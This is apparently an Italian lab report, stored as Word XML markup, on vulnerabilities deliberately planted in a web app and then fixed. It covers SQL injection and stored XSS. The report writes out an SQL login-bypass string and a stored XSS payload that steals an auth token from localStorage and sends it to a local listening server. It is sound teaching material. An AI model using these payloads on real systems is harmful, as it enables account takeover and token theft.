    <w:p w14:paraId="352B4B16" w14:textId="093C3D4C" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7E8C2091" w14:textId="4FBC8BAC" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4D5B0381" w14:textId="31532C19" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="665EC750" w14:textId="664E70F5" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7739F679" w14:textId="77777777" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2D4925A4" w14:textId="77777777" w:rsidR="002D1426" w:rsidRDefault="002D1426" w:rsidP="00467BBC"/>
    <w:p w14:paraId="09F89D23" w14:textId="77777777" w:rsidR="00C46E60" w:rsidRDefault="00C46E60" w:rsidP="00467BBC"/>
    <w:p w14:paraId="28EC353C" w14:textId="77777777" w:rsidR="00C46E60" w:rsidRDefault="00C46E60" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6654A8FD" w14:textId="77777777" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00467BBC"/>
    <w:p w14:paraId="04DEB370" w14:textId="6DE2BE87" w:rsidR="00443F7A" w:rsidRDefault="00443F7A" w:rsidP="00443F7A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Unexpected property leakage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F17771" w14:textId="77777777" w:rsidR="00655E59" w:rsidRDefault="002D1426" w:rsidP="00655E59">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Metodo hobbiesShow() in HomeController: </w:t>
      </w:r>
      <w:r w:rsidR="00655E59">
        <w:t>false positive perché tutti gli attributi dell’oggetto vengono utilizzati.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DAE4C6" w14:textId="77777777" w:rsidR="00655E59" w:rsidRDefault="00655E59" w:rsidP="00655E59">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BC6C034" w14:textId="2F7FE758" w:rsidR="004B30FC" w:rsidRDefault="002D1426" w:rsidP="00655E59">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251674624" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="69790A0B" wp14:editId="1E59A834">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>60325</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6070325" cy="3261360"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="59118252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70325" cy="3261360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="109B9FC4" w14:textId="73EF1BA8" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4AFB5FDC" w14:textId="77777777" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1FAB739D" w14:textId="5520BCE9" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1A1E6596" w14:textId="2871F447" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="002EFE13" w14:textId="30FD7F93" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="18E8CE69" w14:textId="77777777" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="51AF89F2" w14:textId="77777777" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="387A9575" w14:textId="44DF3CFE" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7B401504" w14:textId="52B23729" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="33815213" w14:textId="41826B83" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5803E8BE" w14:textId="6087568C" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0C8094F3" w14:textId="5037DDE5" w:rsidR="00FC6340" w:rsidRDefault="00FC6340" w:rsidP="00FC6340">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48284AB0" w14:textId="6F22D358" w:rsidR="00992E84" w:rsidRDefault="00992E84" w:rsidP="00FC6340">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>È una vulnerabilità che consente all’attaccante di fare query verso il database con lo scopo di accedere o modificare dati che normalmente non potrebbe vedere come le password. Consente inoltre di fare il login in un sito senza essere a conoscenza di username e/o password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF2550A" w14:textId="77777777" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00FC6340">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E8EF001" w14:textId="58E3D15E" w:rsidR="00FC6340" w:rsidRDefault="00992E84" w:rsidP="00FC6340">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Nel nostro codice è</w:t>
      </w:r>
      <w:r w:rsidR="00FC6340">
        <w:t xml:space="preserve"> stata introdotta questa vulnerabilità nel login (metodo /authenticate di UserController) usando lo statement SQL. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCE68B8" w14:textId="293E08EC" w:rsidR="00FC6340" w:rsidRDefault="00FC6340" w:rsidP="00FC6340">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>In particolare</w:t>
      </w:r>
      <w:r w:rsidR="00992E84">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> è stato usato username=user e password=</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6340">
        <w:t>a' or '1'='1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> per fare l’attacco</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE105FB" w14:textId="505EB75B" w:rsidR="00FC6340" w:rsidRDefault="00FC6340" w:rsidP="00FC6340">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Il fix è dato dal codice originale</w:t>
      </w:r>
      <w:r w:rsidR="00F35257">
        <w:t xml:space="preserve"> che non fa uso dell’SQL statement</w:t>
      </w:r>
      <w:r w:rsidR="008B0B12">
        <w:t xml:space="preserve">. Le modifiche sono state apportate alla classe UserController e UserServiceImpl. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659C0FBD" w14:textId="0C84F6FF" w:rsidR="00FC6340" w:rsidRDefault="00FC6340" w:rsidP="00FC6340">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65F0CF1D" w14:textId="3DBF8B8F" w:rsidR="00FC6340" w:rsidRPr="00FC6340" w:rsidRDefault="00C46E60" w:rsidP="00FC6340">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="12F66AFE" wp14:editId="7859CC8E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>203200</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6818810" cy="1845354"/>
            <wp:effectExtent l="0" t="0" r="1270" b="2540"/>
            <wp:wrapNone/>
            <wp:docPr id="439744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18810" cy="1845354"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EEF3D8" w14:textId="134E607F" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="268A1C00" w14:textId="77777777" w:rsidR="00C46E60" w:rsidRDefault="00C46E60" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5418205C" w14:textId="77777777" w:rsidR="00C46E60" w:rsidRDefault="00C46E60" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6BB8CD27" w14:textId="3A51F373" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="38CF4F21" w14:textId="0B2407E2" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Fixed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA001F3" w14:textId="004F231A" w:rsidR="008B6F6D" w:rsidRDefault="00573261" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251709440" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3AD15ED4" wp14:editId="7702402F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6985</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4760859" cy="2667723"/>
            <wp:effectExtent l="0" t="0" r="1905"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0859" cy="2667723"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D565123" w14:textId="2318C826" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3F22A96D" w14:textId="77777777" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="08F84683" w14:textId="77777777" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="546C4086" w14:textId="77777777" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6CCE269F" w14:textId="77777777" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5F927F28" w14:textId="77777777" w:rsidR="00573261" w:rsidRDefault="00573261" w:rsidP="00467BBC"/>
    <w:p w14:paraId="51A1E503" w14:textId="77777777" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="73303B1C" w14:textId="77777777" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="313974EC" w14:textId="78FAEBF3" w:rsidR="004B30FC" w:rsidRDefault="00C079D4" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cross Site Scripting (</w:t>
      </w:r>
      <w:r w:rsidR="00D12C9A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>XSS Stored</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8605E8" w14:textId="77777777" w:rsidR="0091567C" w:rsidRDefault="0091567C" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18FD0C27" w14:textId="49FBE64F" w:rsidR="0091567C" w:rsidRDefault="0091567C" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Questa vulnerabilità si ha quando vengono ricevuti dati eseguibili in maniera dinamica da sorgenti non sicure e salvati su database o altri storage sicuri, con l’obiettivo di restituirli successivamente agli utenti per poterli eseguire a loro insaputa e di conseguenza attaccarli. Ad esempio, si potrebbe</w:t>
      </w:r>
      <w:r w:rsidR="004A3A39">
        <w:t>ro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> inserire </w:t>
      </w:r>
      <w:r w:rsidR="004A3A39">
        <w:t>script JavaScript, HTML tag o HTML attributes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> malevol</w:t>
      </w:r>
      <w:r w:rsidR="004A3A39">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> che, quando viene eseguito dall’utente che lo riceve, ruba</w:t>
      </w:r>
      <w:r w:rsidR="004A3A39">
        <w:t>no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> i suoi dati sensibili.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FD3764" w14:textId="77777777" w:rsidR="0091567C" w:rsidRDefault="0091567C" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27A25642" w14:textId="31BB4F41" w:rsidR="00D12C9A" w:rsidRDefault="00A257E3" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>In questo esempio, a</w:t>
      </w:r>
      <w:r w:rsidR="00D12C9A">
        <w:t xml:space="preserve">bbiamo </w:t>
      </w:r>
      <w:r w:rsidR="0088250F">
        <w:t>aggiunto</w:t>
      </w:r>
      <w:r w:rsidR="00D12C9A">
        <w:t xml:space="preserve"> in HomeController l’api /h</w:t>
      </w:r>
      <w:r w:rsidR="00C262C3">
        <w:t>ello-user</w:t>
      </w:r>
      <w:r w:rsidR="00D12C9A">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="001D2095">
        <w:t xml:space="preserve">al fine </w:t>
      </w:r>
      <w:r w:rsidR="00D12C9A">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="001D2095">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00D12C9A">
        <w:t xml:space="preserve"> poter inserire uno script nel nome di un hobby, inserito da un utente business, in modo tale che un normale user quando apre l’hobby esegue lo script. Lo script è il seguente </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738A5CF1" w14:textId="77777777" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="289B728F" w14:textId="7A76CFD1" w:rsidR="00D12C9A" w:rsidRDefault="00E16865" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00E16865">
        <w:t>&lt;script&gt;&lt;img title="&lt;/script&gt;&lt;img src onerror=" var token = localStorage.getItem('token'); var img = new Image(); img.src = 'http://localhost:3000/log?token=' + encodeURIComponent(token); "&gt;"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C76201D" w14:textId="77777777" w:rsidR="00E16865" w:rsidRDefault="00E16865" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BBAD4B8" w14:textId="4E82286C" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>e permette di mostrare il token di autenticazione</w:t>
      </w:r>
      <w:r w:rsidR="00E16865">
        <w:t xml:space="preserve"> mandandolo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ad un server </w:t>
      </w:r>
      <w:r w:rsidR="00E16865">
        <w:t xml:space="preserve">in ascolto </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che lo salva e lo </w:t>
      </w:r>
      <w:r w:rsidR="00E16865">
        <w:t xml:space="preserve">può </w:t>
      </w:r>
      <w:r>
        <w:t>sfrutt</w:t>
      </w:r>
      <w:r w:rsidR="00E16865">
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> per entrare nell’account dell’user. Di seguito il codice modificato sia nel backend che nel frontend. Nel frontend </w:t>
      </w:r>
      <w:r w:rsidRPr="00D12C9A">
        <w:t>abbiamo creato username ed error in appJS che richiama header.jsx che ric</w:t>
      </w:r>
      <w:r w:rsidR="0091567C">
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12C9A">
        <w:t>iama navbar</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F537CA" w14:textId="77777777" w:rsidR="0091567C" w:rsidRDefault="0091567C" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="311860B4" w14:textId="6D4BAC0E" w:rsidR="00926F16" w:rsidRDefault="00926F16" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Fix: lato backend è stato modificato il metodo helloUser usando un sanitizer di OW</w:t>
      </w:r>
      <w:r w:rsidR="002F292A">
        <w:t>AS</w:t>
      </w:r>
      <w:r>
        <w:t>P che sanitizza il nome per evitare gli attacchi. Lato frontend invece è stato introdotto un controllo sui caratteri non consentiti per maggiore sicurezza.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FA621A" w14:textId="3939EF22" w:rsidR="00D12C9A" w:rsidRPr="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CEAB21B" w14:textId="678E2AAA" w:rsidR="004B30FC" w:rsidRDefault="00370316" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5B681271" wp14:editId="59946C60">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>497840</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-638175</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5117465" cy="3649980"/>
            <wp:effectExtent l="0" t="0" r="6985" b="762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10131"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5117465" cy="364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40B92" w14:textId="0A89E7CC" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="61C2BF80" w14:textId="75BF187C" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="42A96554" w14:textId="412151B8" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="79280D25" w14:textId="501E7BCC" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="15364F36" w14:textId="673A1F8E" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="39104C62" w14:textId="309728DC" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1265285C" w14:textId="3F06F521" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="58D61F9B" w14:textId="7E7E38BF" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="49AE0CE3" w14:textId="3F3ABC6F" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3EC43AEB" w14:textId="4B5BBA00" w:rsidR="00D12C9A" w:rsidRDefault="002F292A" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251676672" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="03AC24EC" wp14:editId="5B89C5E9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1905</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5965825" cy="2106295"/>
            <wp:effectExtent l="0" t="0" r="0"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5825" cy="2106295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCF1677" w14:textId="1259F3F6" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0F42EB12" w14:textId="7DEC730C" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6ED912E2" w14:textId="2C09FEAE" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="28311111" w14:textId="1138B15B" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="568EC460" w14:textId="77777777" w:rsidR="00E16865" w:rsidRDefault="00E16865" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7EC7A80E" w14:textId="77777777" w:rsidR="00E16865" w:rsidRDefault="00E16865" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7890548E" w14:textId="72415BF4" w:rsidR="00E16865" w:rsidRDefault="00E16865" w:rsidP="00467BBC">
      <w:r>
        <w:t xml:space="preserve">Server in ascolto: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E96782" w14:textId="507187B7" w:rsidR="00D12C9A" w:rsidRDefault="00370316" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251728896" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="60FDEBE2" wp14:editId="2E705CDC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>10160</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4244340" cy="2326005"/>
            <wp:effectExtent l="0" t="0" r="381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4340" cy="2326005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15537094" w14:textId="77777777" w:rsidR="00E16865" w:rsidRDefault="00E16865" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0FC781C1" w14:textId="77777777" w:rsidR="00E16865" w:rsidRDefault="00E16865" w:rsidP="00467BBC"/>
    <w:p w14:paraId="15080FA8" w14:textId="77777777" w:rsidR="00E16865" w:rsidRDefault="00E16865" w:rsidP="00467BBC"/>
    <w:p w14:paraId="423289BD" w14:textId="77777777" w:rsidR="00E16865" w:rsidRDefault="00E16865" w:rsidP="00467BBC"/>
    <w:p w14:paraId="15418F3E" w14:textId="77777777" w:rsidR="00E16865" w:rsidRDefault="00E16865" w:rsidP="00467BBC"/>
    <w:p w14:paraId="01DAEFDC" w14:textId="77777777" w:rsidR="00E16865" w:rsidRDefault="00E16865" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2B035A01" w14:textId="74F522C9" w:rsidR="00E16865" w:rsidRDefault="00072AFB" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251729920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1984CFCF" wp14:editId="477B9FC8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>335280</wp:posOffset>
            </wp:positionV>
